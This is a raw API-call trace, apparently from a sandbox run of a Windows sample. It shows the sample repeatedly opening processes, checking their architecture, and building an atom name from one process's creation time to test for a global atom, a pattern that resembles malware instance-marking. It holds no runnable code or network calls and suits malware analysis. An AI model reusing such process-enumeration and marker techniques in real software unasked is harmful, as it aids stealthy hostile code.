	[0103.011] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0103.012] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x690
	[0103.012] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.012] CloseHandle (hObject=0x690) returned 1
	[0103.012] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0103.012] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0103.012] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x690
	[0103.012] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.012] CloseHandle (hObject=0x690) returned 1
	[0103.012] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0103.012] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x690
	[0103.012] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.012] CloseHandle (hObject=0x690) returned 1
	[0103.013] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x690
	[0103.013] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.013] CloseHandle (hObject=0x690) returned 1
	[0103.013] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x690
	[0103.013] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.013] CloseHandle (hObject=0x690) returned 1
	[0103.013] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x690
	[0103.013] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.013] CloseHandle (hObject=0x690) returned 1
	[0103.013] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x690
	[0103.013] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.013] CloseHandle (hObject=0x690) returned 1
	[0103.014] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x690
	[0103.014] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.014] CloseHandle (hObject=0x690) returned 1
	[0103.014] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0103.014] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x690
	[0103.014] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.014] CloseHandle (hObject=0x690) returned 1
	[0103.014] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x690
	[0103.014] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.014] CloseHandle (hObject=0x690) returned 1
	[0103.014] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x690
	[0103.014] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.014] CloseHandle (hObject=0x690) returned 1
	[0103.014] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x690
	[0103.015] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.015] CloseHandle (hObject=0x690) returned 1
	[0103.015] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x690
	[0103.015] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.015] CloseHandle (hObject=0x690) returned 1
	[0103.015] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x690
	[0103.015] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.015] CloseHandle (hObject=0x690) returned 1
	[0103.015] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x690
	[0103.015] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.015] CloseHandle (hObject=0x690) returned 1
	[0103.015] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x690
	[0103.015] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.015] CloseHandle (hObject=0x690) returned 1
	[0103.016] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x690
	[0103.016] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.016] CloseHandle (hObject=0x690) returned 1
	[0103.016] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x690
	[0103.016] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.016] CloseHandle (hObject=0x690) returned 1
	[0103.016] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x690
	[0103.016] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.016] CloseHandle (hObject=0x690) returned 1
	[0103.016] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x690
	[0103.016] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.016] CloseHandle (hObject=0x690) returned 1
	[0103.016] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x690
	[0103.016] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.016] CloseHandle (hObject=0x690) returned 1
	[0103.017] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x690
	[0103.017] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.017] CloseHandle (hObject=0x690) returned 1
	[0103.017] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x690
	[0103.017] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.017] CloseHandle (hObject=0x690) returned 1
	[0103.017] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x690
	[0103.017] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.017] CloseHandle (hObject=0x690) returned 1
	[0103.017] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x690
	[0103.017] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.017] CloseHandle (hObject=0x690) returned 1
	[0103.017] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x690
	[0103.017] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.017] CloseHandle (hObject=0x690) returned 1
	[0103.018] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x690
	[0103.018] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.018] CloseHandle (hObject=0x690) returned 1
	[0103.018] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x690
	[0103.018] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.018] CloseHandle (hObject=0x690) returned 1
	[0103.018] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x690
	[0103.018] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.018] CloseHandle (hObject=0x690) returned 1
	[0103.018] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x690
	[0103.018] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.018] CloseHandle (hObject=0x690) returned 1
	[0103.018] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x690
	[0103.018] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.018] CloseHandle (hObject=0x690) returned 1
	[0103.019] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x690
	[0103.019] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0103.019] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0103.019] GetProcessTimes (in: hProcess=0x690, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0103.019] wsprintfA (in: param_1=0x3993150, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0103.020] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0103.020] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0103.020] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0103.020] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0103.020] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0103.020] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0103.020] CloseHandle (hObject=0x690) returned 1
	[0103.020] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0103.020] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x690
	[0103.020] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.021] CloseHandle (hObject=0x690) returned 1
	[0103.021] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x690
	[0103.021] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.021] CloseHandle (hObject=0x690) returned 1
	[0103.088] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0103.088] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0103.088] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0103.088] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0103.089] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0103.089] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0103.089] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0103.089] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0103.089] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0103.090] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0103.090] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0103.090] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0103.090] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0103.090] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0103.090] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0103.090] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0103.091] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0103.091] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0103.091] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x690
	[0103.091] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.091] CloseHandle (hObject=0x690) returned 1
	[0103.091] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0103.091] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0103.091] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x690
	[0103.092] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.092] CloseHandle (hObject=0x690) returned 1
	[0103.092] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0103.092] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x690
	[0103.092] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.092] CloseHandle (hObject=0x690) returned 1
	[0103.092] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x690
	[0103.092] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.092] CloseHandle (hObject=0x690) returned 1
	[0103.092] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x690
	[0103.092] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.092] CloseHandle (hObject=0x690) returned 1
	[0103.092] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x690
	[0103.093] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.093] CloseHandle (hObject=0x690) returned 1
	[0103.093] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x690
	[0103.093] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.093] CloseHandle (hObject=0x690) returned 1
	[0103.093] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x690
	[0103.093] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.093] CloseHandle (hObject=0x690) returned 1
	[0103.093] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0103.093] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x690
	[0103.093] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.093] CloseHandle (hObject=0x690) returned 1
	[0103.093] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x690
	[0103.093] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.094] CloseHandle (hObject=0x690) returned 1
	[0103.100] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x690
	[0103.100] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.100] CloseHandle (hObject=0x690) returned 1
	[0103.100] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x690
	[0103.100] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.100] CloseHandle (hObject=0x690) returned 1
	[0103.101] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x690
	[0103.101] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.101] CloseHandle (hObject=0x690) returned 1
	[0103.101] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x690
	[0103.101] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.101] CloseHandle (hObject=0x690) returned 1
	[0103.101] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x690
	[0103.101] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.101] CloseHandle (hObject=0x690) returned 1
	[0103.101] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x690
	[0103.101] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.101] CloseHandle (hObject=0x690) returned 1
	[0103.101] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x690
	[0103.101] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.101] CloseHandle (hObject=0x690) returned 1
	[0103.102] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x690
	[0103.102] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.102] CloseHandle (hObject=0x690) returned 1
	[0103.102] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x690
	[0103.102] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.102] CloseHandle (hObject=0x690) returned 1
	[0103.102] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x690
	[0103.102] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.102] CloseHandle (hObject=0x690) returned 1
	[0103.102] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x690
	[0103.102] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.102] CloseHandle (hObject=0x690) returned 1
	[0103.102] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x690
	[0103.103] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.103] CloseHandle (hObject=0x690) returned 1
	[0103.104] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x690
	[0103.104] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.104] CloseHandle (hObject=0x690) returned 1
	[0103.104] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x690
	[0103.104] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.104] CloseHandle (hObject=0x690) returned 1
	[0103.105] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x690
	[0103.105] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.105] CloseHandle (hObject=0x690) returned 1
	[0103.105] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x690
	[0103.105] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.105] CloseHandle (hObject=0x690) returned 1
	[0103.105] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x690
	[0103.105] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.105] CloseHandle (hObject=0x690) returned 1
	[0103.105] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x690
	[0103.105] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.105] CloseHandle (hObject=0x690) returned 1
	[0103.106] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x690
	[0103.106] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.106] CloseHandle (hObject=0x690) returned 1
	[0103.106] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x690
	[0103.106] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.106] CloseHandle (hObject=0x690) returned 1
	[0103.106] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x690
	[0103.106] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.106] CloseHandle (hObject=0x690) returned 1
	[0103.106] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x690
	[0103.107] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0103.107] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0103.107] GetProcessTimes (in: hProcess=0x690, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0103.107] wsprintfA (in: param_1=0x3993150, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0103.107] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0103.108] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0103.108] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0103.108] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0103.108] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0103.108] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0103.108] CloseHandle (hObject=0x690) returned 1
	[0103.110] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0103.110] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x690
	[0103.110] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.110] CloseHandle (hObject=0x690) returned 1
	[0103.110] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x690
	[0103.110] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.110] CloseHandle (hObject=0x690) returned 1
	[0103.145] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0103.145] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0103.145] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0103.146] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0103.146] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0103.146] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0103.146] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0103.146] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0103.146] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0103.146] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0103.147] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0103.147] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0103.147] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0103.147] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0103.147] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0103.147] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0103.147] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0103.147] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0103.148] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x690
	[0103.148] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.148] CloseHandle (hObject=0x690) returned 1
	[0103.148] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0103.148] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0103.148] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x690
	[0103.148] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.148] CloseHandle (hObject=0x690) returned 1
	[0103.148] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0103.148] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x690
	[0103.148] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.149] CloseHandle (hObject=0x690) returned 1
	[0103.149] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x690
	[0103.149] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.149] CloseHandle (hObject=0x690) returned 1
	[0103.149] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x690
	[0103.149] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.149] CloseHandle (hObject=0x690) returned 1
	[0103.149] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x690
	[0103.149] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.149] CloseHandle (hObject=0x690) returned 1
	[0103.149] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x690
	[0103.149] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.149] CloseHandle (hObject=0x690) returned 1
	[0103.150] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x690
	[0103.150] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
